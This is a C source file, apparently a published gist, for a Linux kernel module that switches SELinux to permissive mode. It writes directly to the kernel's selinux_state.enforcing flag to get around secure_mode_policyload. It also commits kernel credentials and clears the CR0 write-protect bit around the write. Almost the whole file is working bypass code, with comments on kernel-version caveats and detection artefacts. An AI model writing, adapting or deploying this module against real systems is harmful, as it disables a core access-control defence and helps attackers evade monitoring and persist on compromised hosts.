Bypassing SELinux secure_mode_policyload with a loadable kernel module (LKM): clearing selinux_state.enforcing directly from kernel mode instead of through selinuxfs
GitHub flags this file as containing hidden or bidirectional Unicode text, which may be interpreted or compiled differently than what appears below. Before building it, review the raw bytes in an editor that reveals hidden Unicode characters — Trojan-Source-style characters can hide code from the rendered view.
#include <linux/cred.h>
#include <linux/irqflags.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <asm/processor.h>
| #define LOG_TAG "[EDRmetry] " | |
| // Define a simplified selinux_state structure (only the enforcing field) | |
| struct selinux_state { | |
| int enforcing; | |
| // Other fields omitted for simplicity | |
| }; | |
/*
 * Runtime address of the kernel's selinux_state object, supplied at load
 * time (e.g. insmod ... selinux_state_addr=0xffffffff...). The module does
 * no symbol lookup of its own; the operator is expected to obtain the
 * address out of band (presumably /proc/kallsyms or System.map — it moves
 * per boot under KASLR). Mode 0644 also exposes it read/write to root under
 * /sys/module/<name>/parameters/, but it is only consumed once, in init.
 */
static unsigned long selinux_state_addr;
module_param(selinux_state_addr, ulong, 0644);
MODULE_PARM_DESC(selinux_state_addr, "Address of selinux_state structure");
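/*
 * Module entry point: treat the caller-supplied address as struct
 * selinux_state and clear its enforcing flag, putting SELinux into
 * permissive mode without going through selinuxfs (and therefore without
 * being subject to secure_mode_policyload).
 *
 * Returns 0 on success (including when already permissive), -EINVAL if
 * selinux_state_addr is missing or not a kernel-space address, -ENOMEM if
 * a kernel credential set could not be allocated.
 */
static int sp_kmod_init(void)
{
	struct selinux_state *state;
	struct cred *kcred;
	unsigned long cr0, flags;

	printk(KERN_INFO LOG_TAG "SELinux disabler kernel module loaded\n");

	/*
	 * Validate the parameter before doing anything else, so a bad address
	 * fails the load without first swapping the insmod task's credentials.
	 */
	if (!selinux_state_addr) {
		printk(KERN_ALERT LOG_TAG "selinux_state address not provided\n");
		return -EINVAL;
	}
	/*
	 * x86_64 only: 0xffffffff80000000 is __START_KERNEL_map; kernel image
	 * data (where selinux_state lives) is mapped above it. This does not
	 * prove the address really is selinux_state — a wrong address means a
	 * silent write into some other kernel object.
	 */
	if (selinux_state_addr < 0xffffffff80000000UL) {
		printk(KERN_ALERT LOG_TAG "Invalid selinux_state address: 0x%lx (not in kernel space)\n", selinux_state_addr);
		return -EINVAL;
	}

	/*
	 * Replace the insmod task's credentials with kernel credentials.
	 * prepare_kernel_cred() returns NULL on allocation failure, and on
	 * v6.2+ kernels also for a NULL daemon argument (confirm against the
	 * target); commit_creds(NULL) would oops, so check before committing.
	 * commit_creds() itself always returns 0, so its result is not checked.
	 */
	kcred = prepare_kernel_cred(NULL);
	if (!kcred) {
		printk(KERN_ALERT LOG_TAG "Failed to set kernel credentials\n");
		return -ENOMEM;
	}
	commit_creds(kcred);

	state = (struct selinux_state *)selinux_state_addr;
	printk(KERN_INFO LOG_TAG "Current selinux_state.enforcing value: %d\n", state->enforcing);

	if (state->enforcing == 0) {
		printk(KERN_INFO LOG_TAG "SELinux already in permissive mode\n");
		return 0;
	}

	/*
	 * CR0 is a per-CPU register: keep interrupts off so this task cannot be
	 * preempted or migrated between clearing WP and restoring it, which
	 * would leave one CPU with WP cleared and restore a stale value here.
	 * NOTE(review): kernels with CR0 pinning (v5.3+) make write_cr0() WARN
	 * and re-set WP rather than clear it; the store below then succeeds
	 * only because selinux_state is ordinary writable .data, not rodata.
	 * Confirm against the target kernel.
	 */
	local_irq_save(flags);
	cr0 = read_cr0();
	write_cr0(cr0 & ~X86_CR0_WP);
	state->enforcing = 0;
	write_cr0(cr0);
	local_irq_restore(flags);

	printk(KERN_INFO LOG_TAG "[SUCCESS] Set selinux_state.enforcing to 0\n");
	return 0;
}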
/*
 * Module teardown. Only logs the unload; it does not restore the
 * enforcing flag, so SELinux stays permissive after rmmod.
 */
static void sp_kmod_exit(void)
{
	pr_info(LOG_TAG "SELinux disabler kernel module unloaded\n");
}
module_init(sp_kmod_init);
module_exit(sp_kmod_exit);
/*
 * NOTE(review): a GPL license string keeps the kernel untainted and lets
 * GPL-only exports resolve; the credential/CR0 helpers used above are
 * assumed to need it — confirm against the target kernel's exports.
 */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("DS");
/*
 * Alias and description are baked into .modinfo and shown by modinfo(8);
 * together with the "[EDRmetry]" log tag they are cheap detection artefacts.
 */
MODULE_ALIAS("SELinux_Disable");
MODULE_DESCRIPTION("SELinux disabler");